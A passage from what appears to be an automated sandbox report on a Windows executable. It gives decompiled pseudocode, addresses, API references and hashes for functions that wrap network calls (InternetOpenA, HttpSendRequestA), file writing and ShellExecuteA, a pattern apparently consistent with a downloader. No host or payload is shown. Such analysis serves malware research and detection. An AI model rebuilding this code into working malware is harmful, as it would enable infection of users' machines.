					E00417A90( &_a8, _v44, E004075F0(_v36), _v16, _a12 & 0x000000ff);
					E0041C9D0(_v40, _v36, _v32 + 1); // executed
					 *_v8 = _v20;
				}
				return _v12;
			}

0x0040a206
0x0040a20c
0x0040a212
0x0040a215
0x0040a21b
0x0040a223
0x0040a226
0x0040a228
0x0040a228
0x0040a233
0x0040a239
0x0040a23c
0x0040a24b
0x0040a256
0x0040a263
0x0040a268
0x0040a26e
0x0040a279
0x0040a282
0x0040a291
0x0040a298
0x0040a2f5
0x0040a302
0x0040a29a
0x0040a29f
0x0040a2bf
0x0040a2d2
0x0040a2dd
0x0040a2dd
0x0040a310

APIs

Part of subcall function 00421040: _Max_value.LIBCPMTD ref: 0042106C
Part of subcall function 00421040: _Min_value.LIBCPMTD ref: 00421092

allocator.LIBCONCRTD ref: 0040A263
allocator.LIBCONCRTD ref: 0040A2D2

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: allocator$Max_valueMin_value
String ID:
API String ID: 1981992285-0
Opcode ID: e2b8faf57cb181a674a8df438d20f194d407c78fce839adbb10f10be01e563b4
Instruction ID: 43a906ba5593c86e71ae2484f50179b05fa03250bbbd2403c433486123871c5e
Opcode Fuzzy Hash: e2b8faf57cb181a674a8df438d20f194d407c78fce839adbb10f10be01e563b4
Instruction Fuzzy Hash: A341F5B5E00109AFCB08DF99C9918EEBBB5BF88304F2485ADE415B7341D734AE41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00418C30 Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418C30(intOrPtr __ecx, intOrPtr _a4) {
				void* _v5;
				signed char _v6;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _t56;
				intOrPtr _t63;
				signed int _t66;

				_v20 = __ecx;
				_v24 = _a4;
				_t5 = _v24 + 0x10; // 0x8b0000f0
				_v16 =  *_t5;
				_v28 = E00419A90(_v24);
				_v12 = _v20;
				if(_v16 >= 0x10) {
					_v5 = 0;
				} else {
					_v5 = 1;
				}
				_v6 = _v5;
				if((_v6 & 0x000000ff) == 0) {
					_v48 = E00419380(_v20);
					_v40 = E00421040(_v20, __eflags);
					_v44 = _v16 | 0x0000000f;
					_v36 =  *((intOrPtr*)(E00411F30( &_v44,  &_v40)));
					_t56 = E0041A610(_v48, __eflags, _v36 + 1); // executed
					_v32 = _t56;
					E00407400( &_v32, _v12,  &_v32);
					__eflags = _v16 + 1;
					E0041B2D0(E004075F0(_v32), _v28, _v16 + 1);
					 *(_v12 + 0x10) = _v16;
					_t63 = _v36;
					 *((intOrPtr*)(_v12 + 0x14)) = _t63;
					return _t63;
				} else {
					E0041B2D0(_v12, _v28, 0x10);
					_t66 = _v16;
					 *(_v12 + 0x10) = _t66;
					 *((intOrPtr*)(_v12 + 0x14)) = 0xf;
					return _t66;
				}
			}

0x00418c36
0x00418c3c
0x00418c42
0x00418c45
0x00418c50
0x00418c56
0x00418c5d
0x00418c65
0x00418c5f
0x00418c5f
0x00418c5f
0x00418c6c
0x00418c75
0x00418ca9
0x00418cb4
0x00418cbd
0x00418cd2
0x00418cdf
0x00418ce4
0x00418cef
0x00418cfa
0x00418d0f
0x00418d1d
0x00418d23
0x00418d26
0x00000000
0x00418c77
0x00418c81
0x00418c8c
0x00418c8f
0x00418c95
0x00000000
0x00418c95

APIs

Part of subcall function 00421040: _Max_value.LIBCPMTD ref: 0042106C
Part of subcall function 00421040: _Min_value.LIBCPMTD ref: 00421092

_Min_value.LIBCPMTD ref: 00418CC8
allocator.LIBCONCRTD ref: 00418CDF

Part of subcall function 0041A610: _Allocate.LIBCONCRTD ref: 0041A624

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Min_value$AllocateMax_valueallocator
String ID:
API String ID: 1398198560-0
Opcode ID: be18ae0db2c004e0272cf73679855d233c8cdef269c29da34d6f31a32e83b113
Instruction ID: edc43b98b0813049f045bd44b9a280f481e7eb2be5028c3b5916bc75b090b3b0
Opcode Fuzzy Hash: be18ae0db2c004e0272cf73679855d233c8cdef269c29da34d6f31a32e83b113
Instruction Fuzzy Hash: 9B315EB5D04208AFCB04DF99D8919EEBBB5BF48304F1081AEE405B7341D739AA85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A060 Relevance: 3.1, APIs: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A060(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t35;
				char _t41;

				_v8 = __ecx;
				_t35 = E00421040(_v8, __eflags);
				_t78 = _a4 - _t35;
				if(_a4 > _t35) {
					E0041A4E0();
				}
				_v20 =  *((intOrPtr*)(_v8 + 0x14));
				_v16 = E004186C0(_v8, _a4);
				_v24 = E00419380(_v8);
				_t41 = E0041A610(_v24, _t78, _v16 + 1); // executed
				_v12 = _t41;
				E00416AC0(_t41, _v8);
				 *((intOrPtr*)(_v8 + 0x10)) = _a4;
				 *((intOrPtr*)(_v8 + 0x14)) = _v16;
				E00417BE0( &_a8, E004075F0(_v12), _a4, _a12);
				if(_v20 < 0x10) {
					E00407400( &_v12, _v8,  &_v12);
				} else {
					E0041C9D0(_v24,  *_v8, _v20 + 1);
					 *_v8 = _v12;
				}
				return _v8;
			}

0x0040a066
0x0040a06c
0x0040a071
0x0040a074
0x0040a076
0x0040a076
0x0040a081
0x0040a090
0x0040a09b
0x0040a0a8
0x0040a0ad
0x0040a0b3
0x0040a0be
0x0040a0c7
0x0040a0e2
0x0040a0eb
0x0040a114
0x0040a0ed
0x0040a0fd
0x0040a108
0x0040a108
0x0040a122

APIs

Part of subcall function 00421040: _Max_value.LIBCPMTD ref: 0042106C
Part of subcall function 00421040: _Min_value.LIBCPMTD ref: 00421092

allocator.LIBCONCRTD ref: 0040A0A8
allocator.LIBCONCRTD ref: 0040A0FD

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: allocator$Max_valueMin_value
String ID:
API String ID: 1981992285-0
Opcode ID: 03c549dbc17f2ceb4cb67bb52b4fa61408ad82322178678cf5770867fea5631b
Instruction ID: 931223058e89bd14a4a590a379319b2985f2a08171002e52fe6f356324eedfa1
Opcode Fuzzy Hash: 03c549dbc17f2ceb4cb67bb52b4fa61408ad82322178678cf5770867fea5631b
Instruction Fuzzy Hash: 4521EAB4E00108EFCB04DF99D991CEEB7B5AF88304B2081AEE405A7351DB34AF50DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00431436 Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00431436(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x0043143b

APIs

Part of subcall function 00437135: GetEnvironmentStringsW.KERNEL32 ref: 0043713E
Part of subcall function 00437135: _free.LIBCMT ref: 0043719D
Part of subcall function 00437135: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004371AC

_free.LIBCMT ref: 00431476
_free.LIBCMT ref: 0043147D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 88dbccf744148d4b0de4b2dd89dae91ccfa56606c5823422a41d3a63df30542c
Instruction ID: 62edf739eff9f6de5cd1368236c70c386d9409b058c1edce07a6c075d9bd6286
Opcode Fuzzy Hash: 88dbccf744148d4b0de4b2dd89dae91ccfa56606c5823422a41d3a63df30542c
Instruction Fuzzy Hash: 55E0E52B50950202B3713E3B3C01A6E1B006BA9338F11636FF460862E3DEAC484209AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402DF0 Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00402DF0(void* __ebx, void* __edi, void* __esi, char _a4) {
				char _v5;
				char _v6;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t12;

				_t12 = E0042DA5C(E0041AF80( &_a4), "r"); // executed
				_v12 = _t12;
				_t28 = _v12;
				if(_v12 == 0) {
					_v6 = 0;
					E00416980( &_a4);
					return _v6;
				}
				_push(_v12);
				E0042D921(__ebx, __edi, __esi, _t28);
				_v5 = 1;
				E00416980( &_a4);
				return _v5;
			}

0x00402e04
0x00402e0c
0x00402e0f
0x00402e13
0x00402e34
0x00402e3b
0x00000000
0x00402e40
0x00402e18
0x00402e19
0x00402e21
0x00402e28
0x00000000

APIs

task.LIBCPMTD ref: 00402E28
task.LIBCPMTD ref: 00402E3B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 37e431d0dc0225e94e221bb4395157bdcb10b2fbd2dc1c6282629d2657af3d31
Instruction ID: dd9dbffabed0df560ac8748beef6ff453bae509f72b03066a7163ff71b5fd4a1
Opcode Fuzzy Hash: 37e431d0dc0225e94e221bb4395157bdcb10b2fbd2dc1c6282629d2657af3d31
Instruction Fuzzy Hash: EEF08970C4814CAACF04EBA0D80A7DD7F345F11304F4440A9E445271C1EB7D5A9ACBD6

Uniqueness

Uniqueness Score: -1.00%

Function 004064F0 Relevance: 1.6, APIs: 1, Instructions: 74
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed short _v6;
				long _v12;
				long _v16;
				long _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;

				_v44 = __ecx;
				_v40 = E0040F320(__eflags);
				_v12 =  *((intOrPtr*)(E004075F0(_a32)));
				_v16 =  *((intOrPtr*)(E004075F0(_a28)));
				_v20 =  *((intOrPtr*)(E004075F0(_a24)));
				_v24 =  *((intOrPtr*)(E004075F0(_a20)));
				_v28 =  *((intOrPtr*)(E004075F0(_a16)));
				_v6 =  *((intOrPtr*)(E004075F0(_a12)));
				_v32 =  *((intOrPtr*)(E004075F0(_a8)));
				_v36 =  *((intOrPtr*)(E004075F0(_a4)));
				return InternetConnectA(_v36, _v32, _v6 & 0x0000ffff, _v28, _v24, _v20, _v16, _v12);
			}

0x004064f6
0x004064fe
0x0040650f
0x00406520
0x00406531
0x00406542
0x00406553
0x00406565
0x00406577
0x00406588
0x004065b2

APIs

InternetConnectA.WININET(?,?,?,?,?,?,?,?), ref: 004065AC

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: 37bd3f894cb33011006d11f719283069021cbe4995baefa09439f633ac2f0835
Instruction ID: 139b7399e05f9c8d33b830679f99c6996a25db1c1bd6f0e9fc54ded659caf30a
Opcode Fuzzy Hash: 37bd3f894cb33011006d11f719283069021cbe4995baefa09439f633ac2f0835
Instruction Fuzzy Hash: FC21B9F5D04208AFCF04DFA5D8818AF77B5AF4C304B144569F509A7391E639E910DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00406F50 Relevance: 1.6, APIs: 1, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406F50(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* _v8;
				long _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				long _v24;
				long _v28;
				CHAR* _v32;
				intOrPtr _v36;
				intOrPtr _v40;

				_v40 = __ecx;
				_v36 = E0040F4C0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a28)));
				_v12 =  *((intOrPtr*)(E004075F0(_a24)));
				_v16 =  *((intOrPtr*)(E004075F0(_a20)));
				_v20 =  *((intOrPtr*)(E004075F0(_a16)));
				_v24 =  *((intOrPtr*)(E004075F0(_a12)));
				_v28 =  *((intOrPtr*)(E004075F0(_a8)));
				_v32 =  *((intOrPtr*)(E004075F0(_a4)));
				return CreateFileA(_v32, _v28, _v24, _v20, _v16, _v12, _v8);
			}

0x00406f56
0x00406f5e
0x00406f6f
0x00406f80
0x00406f91
0x00406fa2
0x00406fb3
0x00406fc4
0x00406fd5
0x00406ffa

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00402EBF), ref: 00406FF4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f29fa59ab3ee97d057c504cb84f91b324025895d9bde1dc047f61dd8202dfd86
Instruction ID: 91418bdbf18f9f9a9b509fa39e94ab0a7d0664c69adbe8e86bb8b5c186f2073e
Opcode Fuzzy Hash: f29fa59ab3ee97d057c504cb84f91b324025895d9bde1dc047f61dd8202dfd86
Instruction Fuzzy Hash: 67211DF5D04208AFCF04DF95D88189F77B5AF4C304B14816DF509A7351E634E910DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406BB0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;

				_v36 = __ecx;
				_v32 = E0040EE40(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a24)));
				_v12 =  *((intOrPtr*)(E004075F0(_a20)));
				_v16 =  *((intOrPtr*)(E004075F0(_a16)));
				_v20 =  *((intOrPtr*)(E004075F0(_a12)));
				_v24 = E004075F0(_a8);
				_v28 =  *((intOrPtr*)(E004075F0(_a4)));
				return ShellExecuteA(_v28, _v24, _v20, _v16, _v12, _v8);
			}

0x00406bb6
0x00406bbe
0x00406bcf
0x00406be0
0x00406bf1
0x00406c02
0x00406c11
0x00406c22
0x00406c43

APIs

ShellExecuteA.SHELL32(?,?,?,?,?,?), ref: 00406C3D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 79e0462960c365d619532653622caea4fcdd46108e6d868ac5c13cffca681b2b
Instruction ID: 143dbe196853edf06c7d14500650451f24106483ca35bcdeaebee8bda2e51e14
Opcode Fuzzy Hash: 79e0462960c365d619532653622caea4fcdd46108e6d868ac5c13cffca681b2b
Instruction Fuzzy Hash: 88110DF5D04209AFCF04DF95D88189F7BB5AF4C304B04856DF609A7351E634EA10DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00433D3A Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00433D3A(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E00433B10(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E004397EE( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x4c7548 =  *0x4c7548 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}

0x00433d4b
0x00433d57
0x00433d58
0x00433d59
0x00433d60
0x00433db9
0x00433dbc
0x00433d62
0x00433d74
0x00433d7e
0x00000000
0x00433d80
0x00433d83
0x00433d8f
0x00433d97
0x00433d9d
0x00433da3
0x00433da9
0x00433db1
0x00433db8
0x00433db8
0x00433d7e

APIs

__wsopen_s.LIBCMT ref: 00433D74

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 49a81070f15aa5bed6b977351f8feb406f6e9dba6a6ceed32688fcc2871c8d21
Instruction ID: 91be2b8a0b5910ba5b2e5ffda805299f0dbc94e444f5c8395d63a8c603921249
Opcode Fuzzy Hash: 49a81070f15aa5bed6b977351f8feb406f6e9dba6a6ceed32688fcc2871c8d21
Instruction Fuzzy Hash: 6B111875A0410AAFCF05DF59E94199B7BF4EF48304F0440AAF805EB351D674EE15CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004067E0 Relevance: 1.6, APIs: 1, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067E0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct _OVERLAPPED* _v8;
				DWORD* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;

				_v32 = __ecx;
				_v28 = E0040E620(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a20)));
				_v12 =  *((intOrPtr*)(E004075F0(_a16)));
				_v16 =  *((intOrPtr*)(E004075F0(_a12)));
				_v20 =  *((intOrPtr*)(E004075F0(_a8)));
				_v24 =  *((intOrPtr*)(E004075F0(_a4)));
				return WriteFile(_v24, _v20, _v16, _v12, _v8);
			}

0x004067e6
0x004067ee
0x004067ff
0x00406810
0x00406821
0x00406832
0x00406843
0x00406860

APIs

WriteFile.KERNELBASE(00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,C0000000,00000000,00000000,00000002,00000080), ref: 0040685A

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 249a73dae7d1d6be4d480e0665ee77d56829bd609850add62814f91ae1fc9139
Instruction ID: 96d28d966ed120b29bc17b096bb8f1e10b71f1b4269cc93da669b169186b9e85
Opcode Fuzzy Hash: 249a73dae7d1d6be4d480e0665ee77d56829bd609850add62814f91ae1fc9139
Instruction Fuzzy Hash: E7111FF9D04208AFCB04DF95D88189F7BB4AF4C304F14856DF509A7352E634AA10DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00406870 Relevance: 1.6, APIs: 1, Instructions: 50
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406870(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v8;
				void* _v12;
				long _v16;
				char* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;

				_v32 = __ecx;
				_v28 = E0040E550(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a20)));
				_v12 =  *((intOrPtr*)(E004075F0(_a16)));
				_v16 =  *((intOrPtr*)(E004075F0(_a12)));
				_v20 =  *((intOrPtr*)(E004075F0(_a8)));
				_v24 =  *((intOrPtr*)(E004075F0(_a4)));
				return HttpSendRequestA(_v24, _v20, _v16, _v12, _v8);
			}

0x00406876
0x0040687e
0x0040688f
0x004068a0
0x004068b1
0x004068c2
0x004068d3
0x004068f0

APIs

HttpSendRequestA.WININET(?,?,?,?,?), ref: 004068EA

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 4744eb430ac4f792ea493859b5aa3683b98b8203066324d3e993e43e5aff4ced
Instruction ID: 22d95e6871482bb6519e10432ba45f9adf64f7a8eda34d28f9b62b3b2a9cc1a6
Opcode Fuzzy Hash: 4744eb430ac4f792ea493859b5aa3683b98b8203066324d3e993e43e5aff4ced
Instruction Fuzzy Hash: F011EFF9D04209AFCB04DF95D88189F7BB5AF4C304B14856DF509A7351E634EA10DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00406AD0 Relevance: 1.6, APIs: 1, Instructions: 50
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406AD0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v8;
				char* _v12;
				char* _v16;
				long _v20;
				char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;

				_v32 = __ecx;
				_v28 = E0040F3F0(__eflags);
				_v8 =  *((intOrPtr*)(E004075F0(_a20)));
				_v12 =  *((intOrPtr*)(E004075F0(_a16)));
				_v16 =  *((intOrPtr*)(E004075F0(_a12)));
				_v20 =  *((intOrPtr*)(E004075F0(_a8)));
				_v24 =  *((intOrPtr*)(E004075F0(_a4)));
				return InternetOpenA(_v24, _v20, _v16, _v12, _v8);
			}

0x00406ad6
0x00406ade
0x00406aef
0x00406b00
0x00406b11
0x00406b22
0x00406b33
0x00406b50

APIs

InternetOpenA.WININET(?,?,?,?,?), ref: 00406B4A

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 8c07503c4b54b0869524c58c133e60e01b1bbab738430f6e2b09889bfd7f4471
Instruction ID: 1bc698859c6efd109d25ce7841a2a4eca527b6c056881304526ece671caf8788
Opcode Fuzzy Hash: 8c07503c4b54b0869524c58c133e60e01b1bbab738430f6e2b09889bfd7f4471
Instruction Fuzzy Hash: 4D11EFF9D04209AFCB04DF99D88189F7BB5AF4C304B14856DF509A7352E634AA10DB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1F0 Relevance: 1.5, APIs: 1, Instructions: 45
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0041A1F0(intOrPtr* __ecx) {
				char _v5;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t20;
				void* _t46;

				_v12 = __ecx;
				E00416AC0(_t20, _v12);
				if((E00419880(_v12) & 0x000000ff) != 0) {
					_v16 =  *_v12;
					_v20 = E00419380(_v12);
					_push(_v12);
					E004071D0(_v12);
					_t46 = _t46 + 4;
					_t10 = _v12 + 0x14; // 0x4ce9e850
